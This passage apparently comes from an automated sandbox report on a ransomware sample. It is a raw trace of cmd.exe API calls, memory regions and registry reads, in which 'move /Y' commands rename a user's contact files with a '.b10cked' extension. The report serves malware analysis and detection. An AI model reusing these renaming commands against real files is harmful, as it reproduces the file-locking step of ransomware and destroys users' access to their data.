_String2="DEL") returned 9 [0219.365] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.365] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="MD") returned 11 [0219.365] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.365] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.365] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.365] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.365] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.365] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.365] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.365] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.365] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.365] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0219.366] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.366] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.367] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.367] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.368] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.368] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.368] _wcsicmp (_String1="LODKDA~1.CON", _String2=".") returned 62 [0219.368] _wcsicmp (_String1="LODKDA~1.CON", _String2="..") returned 62 [0219.368] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\lodkda~1.con")) returned 0x20 [0219.369] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x341e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.369] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", nBufferLength=0x104, lpBuffer=0x12ed54, lpFilePart=0x12ed3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", lpFilePart=0x12ed3c*="LODKDA~1.CON") returned 0x26 [0219.369] SetErrorMode (uMode=0x0) returned 0x1 [0219.369] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.369] _wcsicmp (_String1="LODKDA~1.CON", _String2=".") returned 62 [0219.369] _wcsicmp (_String1="LODKDA~1.CON", _String2="..") returned 62 [0219.369] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\lodkda~1.con")) returned 0x20 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.369] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", nBufferLength=0x104, lpBuffer=0x12f1d0, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", lpFilePart=0x12ef68*="LODKDA~1.CON") returned 0x26 [0219.369] SetErrorMode (uMode=0x0) returned 0x1 [0219.369] SetErrorMode (uMode=0x0) returned 0x0 [0219.369] SetErrorMode (uMode=0x1) returned 0x0 [0219.370] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12f3d8, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", lpFilePart=0x12ef68*="lodkd auftnm.contact.b10cked") returned 0x36 [0219.370] SetErrorMode (uMode=0x0) returned 0x1 [0219.370] SetLastError (dwErrCode=0x0) [0219.370] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked" (normalized: 
"c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.b10cked")) returned 0xffffffff [0219.370] GetLastError () returned 0x2 [0219.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", fInfoLevelId=0x1, lpFindFileData=0x12e8e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8e4) returned 0x330e50 [0219.370] FindNextFileW (in: hFindFile=0x330e50, lpFindFileData=0x12e8e4 | out: lpFindFileData=0x12e8e4) returned 0 [0219.371] GetLastError () returned 0x12 [0219.371] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0219.372] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON", fInfoLevelId=0x1, lpFindFileData=0x341bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341bd0) returned 0x330e50 [0219.372] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked", lpFilePart=0x0) returned 0x36 [0219.373] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0219.373] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact")) returned 0x20 [0219.373] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.b10cked"), dwFlags=0x3) returned 1 [0219.373] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0219.373] _vsnwprintf (in: 
_Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb30 | out: _Buffer=" 1") returned 9 [0219.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.373] GetFileType (hFile=0x7) returned 0x2 [0219.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eabc | out: lpMode=0x12eabc) returned 1 [0219.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eaf0 | out: lpConsoleScreenBufferInfo=0x12eaf0) returned 1 [0219.408] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.408] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb30 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eb14, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eb14*=0x1a) returned 1 [0219.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.409] SetConsoleInputExeNameW () returned 0x1 [0219.409] GetConsoleOutputCP () returned 0x1b5 [0219.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.409] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.409] exit (_Code=0) Process: id = "568" image_name = "cmd.exe" filename 
= "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32762 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32763 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32764 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32765 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32766 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32767 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32768 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32769 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32770 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32771 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32827 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32828 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32829 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 32830 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 32831 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32832 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32833 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32834 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32838 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32839 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32854 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32855 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32856 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 
Region: id = 32857 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32858 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32859 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32860 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32861 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 32862 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 32863 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 771 os_tid = 0xe44 [0219.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f91c | out: lpSystemTimeAsFileTime=0x22f91c*(dwLowDateTime=0xb7a372e0, dwHighDateTime=0x1d440a9)) [0219.508] GetCurrentProcessId () returned 0xf40 [0219.508] GetCurrentThreadId () returned 0xe44 [0219.508] GetTickCount () returned 0x3d4bc [0219.508] QueryPerformanceCounter (in: lpPerformanceCount=0x22f914 | out: lpPerformanceCount=0x22f914*=27629747886) returned 1 [0219.509] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.509] __set_app_type (_Type=0x1) [0219.509] __p__fmode () returned 0x76b331f4 [0219.509] __p__commode () returned 0x76b331fc [0219.509] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.509] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, 
_Env=0x4a1e423c) returned 0 [0219.509] GetCurrentThreadId () returned 0xe44 [0219.510] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x38 [0219.510] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.510] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.510] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.517] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f8ac | out: phkResult=0x22f8ac*=0x0) returned 0x2 [0219.518] VirtualQuery (in: lpAddress=0x22f8e3, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.518] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) 
returned 0x1c [0219.518] GetConsoleOutputCP () returned 0x1b5 [0219.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.518] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.519] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.520] GetEnvironmentStringsW () returned 0x2c0180* [0219.520] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0219.520] GetEnvironmentStringsW () returned 0x2c0180* [0219.520] FreeEnvironmentStringsW (penv=0x2c0180) returned 1 [0219.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x40) returned 0x0 [0219.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0xa8, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.520] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, 
lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegCloseKey (hKey=0x40) returned 0x0 [0219.521] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x40) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, 
